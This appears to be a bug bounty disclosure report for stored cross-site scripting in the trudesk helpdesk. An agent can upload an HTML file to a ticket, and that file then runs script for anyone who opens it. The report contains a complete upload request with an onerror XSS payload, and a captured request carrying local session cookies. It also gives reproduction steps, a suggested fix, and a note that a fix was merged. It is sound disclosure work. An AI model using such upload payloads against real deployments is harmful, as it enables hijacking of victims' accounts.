Least Privilege Violation in polonel/trudesk

Valid
Reported on Jun 15th 2021

💥 BUG

Stored xss via file upload

💥 IMPACT

Stored xss allow to execute arbitary javascript in victim trudesk account External user also can execute xss in admin account here.

💥 STEP TO REPRODUCE

1. First from admin goto http://localhost:8118/teams and create a team called team2.
Now goto http://localhost:8118/accounts/agents and add new user called user B with support role and assign him to above team2.\

2. Now as a external user goto http://localhost:8118/newissue and create a new ticket .

3. Now user B goto his account and here he can see above public ticket .
Now user B can upload attachment to this ticket .
Here user B can attach any file including html and html file can execute javascript .
When uploading html file bellow request is sent to server

POST /tickets/uploadattachment HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34732645982285409509843513490
Content-Length: 409
Origin: http://localhost:8118
Connection: close
Referer: http://localhost:8118/tickets/1004
Cookie: PHPSESSID=n3ofevpn16pm9p45ngraltrbtk; SMFCookie600=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%220bf82305176bf11c423867c0f41a1f7944174f1e%22%3Bi%3A2%3Bi%3A1812778653%3Bi%3A3%3Bi%3A2%3B%7D; ElkArteCookie700=%5B1%2C%22b34b4193d3296f9b57616347174aaf58503bf2226225496e5a159745bea75aba%22%2C1812793345%2C2%5D; _csrf=X6SB4CbNToC6T0TuClv-MPqa; express.sid=s%3A5tJvaz7mQH_plOxJ0Qm39QiZ0gZ6hpQ2.J5ipJrnNm3tGCLsqbRWuvnbIJBLL9XC3vHMTg4DEHCo; $trudesk%3Atimezone=America/New_York; connect.sid=s%3APvO_kBBiQoJLhJ-OvfW6Zgv0zwLxrTD0.owzip3EbVPWPph8Ac2o7Al34KE5gNPk08e0eyd%2B%2Bze4; io=EzJ4Vn6dOVHG5S_8AAAJ; $trudesk%3Asidebar%3Aexpanded=false

-----------------------------34732645982285409509843513490
Content-Disposition: form-data; name="ticketId"

60c632a56e8507002262a20a
-----------------------------34732645982285409509843513490
Content-Disposition: form-data; name="attachment"; filename="exif.html"
Content-Type: text/html

xss"'><img src=x onerror=alert(document.domain)>
-----------------------------34732645982285409509843513490--

After uploading user can access uploaded file using url like http://localhost:8118/uploads/tickets/60c632a56e8507002262a20a/attachment_exif.html .
if any user open this file then xss is executed .

SUGGESTED FIX

when serving uploaded file dont render it . You can use Content-Disposition: attachment; filename="filename.html" header to prevent rendering html file , it will ask user to download the file

Chris Brame validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
$25
The fix bounty is now up for grabs
$6.25
Chris Brame confirmed that a fix has been merged on 25c5ae a month ago
Chris Brame has been awarded the fix bounty
$6.25